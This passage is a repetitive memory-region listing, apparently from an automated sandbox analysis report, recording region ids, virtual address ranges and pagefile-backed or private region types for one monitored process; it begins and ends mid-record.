0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13462 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13463 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13464 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13465 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13466 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13467 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13468 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13469 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13470 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13471 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13472 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13473 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13474 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13475 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13476 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13477 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13478 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13479 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13480 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13481 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13482 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13483 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13484 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13485 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13486 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13487 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13488 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13489 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13490 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13491 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13492 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13493 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13494 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13495 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13496 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13497 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13498 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13499 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13500 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13501 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13502 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13503 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13504 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13505 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13506 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13507 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13508 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13509 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13510 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13511 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13512 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13513 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13514 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13515 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13516 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13517 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13518 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13519 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13520 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13521 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13522 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13523 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13524 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13525 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13526 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13527 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13528 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13529 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 13530 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13531 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13532 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13533 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13534 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13535 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13536 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13537 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13538 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13539 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13540 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13541 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13542 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13543 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13544 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13545 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13546 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13547 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13548 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13549 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13550 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13551 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13552 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13553 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 13554 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13555 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13556 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13557 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13558 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13559 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13560 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13561 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13562 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13563 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13564 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13565 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13566 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13567 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13568 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13569 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13570 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13571 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13572 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13573 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13574 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13575 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13576 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13577 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13578 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13579 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13580 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13581 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13582 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13583 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13584 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13585 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13586 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13587 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13588 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13589 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13590 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13591 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13592 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13593 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 13594 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13595 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13596 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13597 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13598 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13599 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13600 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13601 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13602 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13603 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13604 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13605 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13606 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13607 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13608 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13609 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13610 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13611 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13612 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13613 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13614 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13615 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13616 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13617 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13618 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13619 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13620 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13621 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13622 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13623 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13624 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13625 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13626 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13627 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13628 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13629 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13630 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13631 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13632 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13633 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13634 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13635 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13636 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13637 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13638 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13639 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13640 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13641 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13642 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13643 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13644 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13645 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 13646 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13647 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13648 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = 